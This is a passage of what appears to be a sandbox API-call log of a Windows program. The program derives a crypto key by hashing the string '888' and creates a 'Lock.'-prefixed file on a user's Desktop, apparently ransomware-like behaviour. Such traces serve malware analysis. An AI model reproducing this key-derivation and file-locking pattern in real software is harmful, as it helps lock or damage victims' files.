lpsz="SSA1A0070620F") returned 0xd [0107.134] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0107.134] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0107.135] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0107.135] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0107.135] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0107.135] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0107.135] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0107.135] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0107.135] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0107.135] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0107.135] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0107.135] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0107.135] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0107.135] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0107.135] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0107.135] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0107.135] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0107.135] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0107.135] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0107.135] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0107.135] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0107.135] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0107.135] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0107.135] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0107.135] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0107.136] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aa9eb0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0107.136] CryptCreateHash (in: hProv=0x9bf330, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0107.136] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0107.136] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0107.136] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0107.136] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0107.136] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0107.136] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a719e8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0107.136] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0107.136] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0107.136] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0107.136] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71ad8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0107.136] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0107.136] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0107.136] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0107.136] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0107.136] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0107.136] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0107.136] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0107.136] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0107.136] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aa9c88, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0107.136] CryptHashData (hHash=0x9a3b80, pbData=0x2a71a38, dwDataLen=0x3, dwFlags=0x1) returned 1 [0107.136] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0107.137] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0107.137] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0107.137] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0107.137] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0107.137] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0107.137] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0107.137] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0107.137] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0107.137] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0107.137] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0107.137] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0107.137] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0107.137] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0107.137] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0107.137] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aa9d00, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0107.137] CryptDeriveKey (in: hProv=0x9bf330, Algid=0x6601, hBaseData=0x9a3b80, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9a47c0) returned 1 [0107.137] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0107.137] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0107.137] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0107.137] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0107.137] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0107.137] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0107.137] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0107.137] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0107.138] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0107.138] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0107.138] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0107.138] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0107.138] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0107.138] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f70a0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0107.138] CryptDestroyHash (hHash=0x9a3b80) returned 1 [0107.138] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0107.138] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0107.138] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0107.138] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0107.138] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0107.139] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/yi TyUTEx1dVRHalW" (normalized: "c:\\users\\fd1hvy\\desktop\\yi tyutex1dvrhalw"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0107.139] GetLastError () returned 0x5 [0107.139] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0107.139] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b28 [0107.139] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0107.139] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ecc0 [0107.139] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0107.139] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ecc0 | out: hHeap=0x2af0000) returned 1 [0107.139] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0107.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0107.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0107.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0107.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b28 [0107.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0107.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0107.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0107.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b28 [0107.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0107.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0107.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0107.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0107.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0107.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0107.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0107.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0107.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0107.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0107.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b28 [0107.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a75240 [0107.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0107.174] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop/" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0107.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75240 | out: hHeap=0x2af0000) returned 1 [0107.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0107.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ecc0 [0107.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2aae878 [0107.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0107.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b28 [0107.174] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/Lock.yi TyUTEx1dVRHalW" (normalized: "c:\\users\\fd1hvy\\desktop\\lock.yi tyutex1dvrhalw"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0107.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7000 [0107.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0107.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0107.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0107.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0107.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0107.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0107.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0107.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0107.175] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0107.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0107.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0107.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0107.175] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0107.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0107.175] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0107.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0107.175] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0107.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0107.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0107.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0107.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0107.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0107.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0107.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0107.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0107.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0107.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0107.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0107.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0107.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0107.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0107.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0107.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0107.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f20 [0107.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0107.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0107.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0107.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0107.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0107.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0107.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0107.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0107.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f20 | out: hHeap=0x2af0000) returned 1 [0107.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0107.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0107.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0107.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0107.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0107.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0107.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0107.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0107.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0107.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0107.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0107.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0107.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0107.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0107.177] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0107.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 